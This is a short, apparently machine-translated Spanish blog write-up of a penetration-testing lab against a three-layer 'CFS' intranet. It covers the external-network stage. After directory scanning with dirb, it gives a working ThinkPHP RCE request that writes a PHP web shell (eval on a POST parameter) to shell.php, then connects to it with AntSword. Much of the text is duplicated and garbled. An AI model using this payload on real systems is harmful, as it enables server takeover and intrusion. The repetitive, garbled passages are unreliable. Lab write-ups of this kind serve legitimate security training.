Penetración de intranet de tres capas CFS: gestión de red externa (1)

2024-07-12

Tabla de contenido

Primero explotémoslo para ver si hay alguna forma de atacar.

Probé la ruta sospechosa y descubrí que era el marco thinkphp. También conocía la versión, así que peleemos al día siguiente.

escribir en php

Edite y escriba en php con éxito, simplemente consígalo al día siguienteEditar

Enlace de prueba Ant Sword rce

Gestionado con éxito

Gestión de red externa

Primero explotémoslo para ver si hay alguna forma de atacar.

Puedes probar dirsearch, dirb, gobuster y otras herramientas.

dirb http://192.168.20.130/

Probé la ruta sospechosa y descubrí que era el marco thinkphp. También conocía la versión, así que peleemos al día siguiente.

escribir en php

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Escrito con éxito en php, fácil de conseguir.

http://192.168.20.130/public/shell.php

Compartir tecnología

Penetración de intranet de tres capas CFS: gestión de red externa (1)

Gestión de red externa

Primero explotémoslo para ver si hay alguna forma de atacar.

Probé la ruta sospechosa y descubrí que era el marco thinkphp. También conocía la versión, así que peleemos al día siguiente.

escribir en php

Escrito con éxito en php, fácil de conseguir.

Enlace de prueba Ant Sword rce

Gestionado con éxito

Perfil personal

Mi información de contacto